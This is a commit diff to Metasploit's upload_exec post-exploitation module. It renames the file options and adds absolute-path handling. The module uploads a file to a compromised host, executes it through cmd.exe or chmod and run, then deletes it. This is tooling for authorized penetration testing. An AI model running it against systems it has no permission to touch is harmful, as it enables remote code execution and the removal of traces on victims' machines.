Land #10384, upload_exec fixes

modules/post/multi/manage/upload_exec.rb

@@ -18,34 +18,43 @@ class MetasploitModule < Msf::Post
 
     register_options(
       [
-        OptPath.new('LFILE', [true,'Local file to upload and execute']),
+        OptPath.new('LPATH', [true,'Local file path to upload and execute']),
-        OptString.new('RFILE', [false,'Name of file on target (default is basename of LFILE)']),
+        OptString.new('RPATH', [false,'Remote file path on target (default is basename of LPATH)']),
       ])
   end
 
-  def rfile
+  def rpath
-    if datastore['RFILE'].blank?
+    if datastore['RPATH'].blank?
-      remote_name = File.basename(datastore['LFILE'])
+      remote_name = File.basename(datastore['LPATH'])
     else
-      remote_name = datastore['RFILE']
+      remote_name = datastore['RPATH']
     end
 
     remote_name
   end
 
-  def lfile
+  def lpath
-    datastore['LFILE']
+    datastore['LPATH']
   end
 
   def run
-    upload_file(rfile, lfile)
+    upload_file(rpath, lpath)
 
     if session.platform.include?("windows")
-      cmd_exec("cmd.exe /c start #{rfile}", nil, 0)
+      cmd_exec("cmd.exe /c start #{rpath}", nil, 0)
     else
-      cmd_exec("chmod 755 #{rfile} && ./#{rfile}", nil, 0)
+      cmd = "chmod 700 #{rpath} && "
-    end
+
-    rm_f(rfile)
+      # Handle absolute paths
-  end
+      if rpath.start_with?('/')
+        cmd << rpath
+      else
+        cmd << "./#{rpath}"
       end
 
+      cmd_exec(cmd, nil, 0)
+    end
+
+    rm_f(rpath)
+  end
+end